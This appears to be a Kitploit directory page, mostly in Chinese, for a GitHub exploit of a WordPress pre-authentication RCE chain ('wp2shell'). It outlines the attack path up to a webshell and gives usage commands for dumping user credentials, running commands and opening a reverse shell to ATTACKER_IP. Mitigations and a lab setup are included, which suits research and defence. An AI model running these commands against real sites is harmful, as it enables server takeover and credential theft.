Skip to content
KitploitKITPLOIT
工具博客
Log in
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-63030-CVE-2026-60137 — WordPress 预认证 RCE 漏洞利用(CVE-2026-63030 + CVE-2026-60137),将路由混淆与 SQL 注入链式组合,实现完整 shell 访问权限。附带 Docker 实验环境,便于安全测试。 | Kitploit
工具/GitHubGitHub/giangdurian/cve-2026-63030-cve-2026-60137
漏洞分析漏洞利用Web应用程序漏洞利用CTF渗透测试学习与教育实验室与实践
GitHubgiangdurian/cve-2026-63030-cve-2026-60137

CVE-2026-63030-CVE-2026-60137

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →

WordPress 预认证 RCE 漏洞利用(CVE-2026-63030 + CVE-2026-60137),将路由混淆与 SQL 注入链式组合,实现完整 shell 访问权限。附带 Docker 实验环境,便于安全测试。

查看仓库
242个月前尚未审核
分享

CVE-2026-63030 & CVE-2026-60137 — wp2shell

WordPress Core 预认证 RCE — 路由混淆 + SQL 注入链式利用实现远程代码执行

CVECVE-2026-63030 + CVE-2026-60137
Aliaswp2shell
漏洞类型REST API 路由混淆 → SQL 注入 → RCE
严重程度严重 — CVSS 10.0
受影响版本WordPress 6.9.0–6.9.4, 7.0.0–7.0.1
修复版本WordPress 6.8.6, 6.9.5, 7.0.2
认证要求无需认证(预认证)

概述

wp2shell 是 WordPress Core 中两个漏洞组合利用链的名称:

  • CVE-2026-63030 — 路由混淆:当子请求的路径错误时,批量端点(/wp-json/batch/v1)在数组 $matches[] 和 $validation[] 之间发生索引错位,导致下一个子请求在错误的 handler 下执行 → 绕过 REST API schema 校验。
  • CVE-2026-60137 — SQL 注入:WP_Query::get_posts() 在 author__not_in 参数接收 string 而非 array 时未进行清理 → 原始 SQL 注入。

这两个 bug 结合形成了完整的 预认证 RCE 链 — 仅通过 HTTP 请求即可从 0 个凭据获得服务器上的 shell。

利用链

Route Confusion (bypass REST validation)
    → SQL Injection (đọc DB: users, secret keys)
        → oEmbed cache poisoning (read-only SQLi → write primitive)
            → customize_changeset (tạo admin mới)
                → Plugin upload (webshell)
                    → Remote Code Execution

完整的深入技术分析请参阅 REPORT.md


实验环境搭建

该实验环境使用 Docker Compose 运行 3 个容器:

容器镜像端口
WordPress(存在漏洞)wordpress:6.9.48080
MySQLmysql:8.0内部
phpMyAdminphpmyadmin:latest8081

环境要求

  • Docker + Docker Compose
  • Python 3.8+(仅使用标准库,无需安装额外 package)
  • Bash(用于运行 setup.sh)

启动

cd wp2shell-lab
bash setup.sh

脚本会自动:

  1. 拉取镜像并启动容器
  2. 安装 WordPress 6.9.4
  3. 填充示例数据(文章、用户)
  4. 启用 MySQL general log + WP_DEBUG

完成后将显示 "WP2Shell Lab — READY!" 以及登录信息。

清理

cd wp2shell-lab
docker compose down -v

漏洞利用用法

# Kiểm tra vulnerability
python3 exploit.py check http://TARGET:8080

# Kiểm tra + xác nhận SQLi
python3 exploit.py check --confirm-sqli http://TARGET:8080

# Đọc user credentials từ database
python3 exploit.py read --preset users http://TARGET:8080

# Chạy câu SQL tùy ý
python3 exploit.py read --query "SELECT @@version" http://TARGET:8080

# Full RCE — chạy command
python3 exploit.py shell --cmd "id" http://TARGET:8080

# Reverse shell
python3 exploit.py shell --reverse ATTACKER_IP:PORT http://TARGET:8080

PoC 脚本为从头重写,参考自 Icex0/wp2shell-poc。 仅使用 Python 3 标准库实现,无需安装额外依赖。


利用条件

条件要求
WordPress 版本6.9.0–6.9.4 或 7.0.0–7.0.1
REST API 批量端点可访问(默认启用)
认证无需认证
网络攻击者可访问 WordPress

缓解措施

  1. 升级 WordPress 至 >= 6.9.5 或 >= 7.0.2 — 唯一彻底的解决方案。
  2. 临时禁用批量端点:在 functions.php 中添加 add_filter('rest_batch_disabled', '__return_true');。
  3. WAF 规则:拦截包含 SQL 关键字的对 /wp-json/batch/v1 的请求。

免责声明

本仓库仅用于研究、学习及 CTF 目的,请于受控的实验环境中使用。 请勿用于攻击真实系统。任何未经授权的利用行为均属违法。


参考资料

  • Icex0/wp2shell-poc — 参考的原始 PoC
  • WordPress 6.9.4 — class-wp-rest-server.php
  • WordPress 6.9.4 — class-wp-query.php
  • Patch diff 6.9.4 -> 6.9.5
下载工具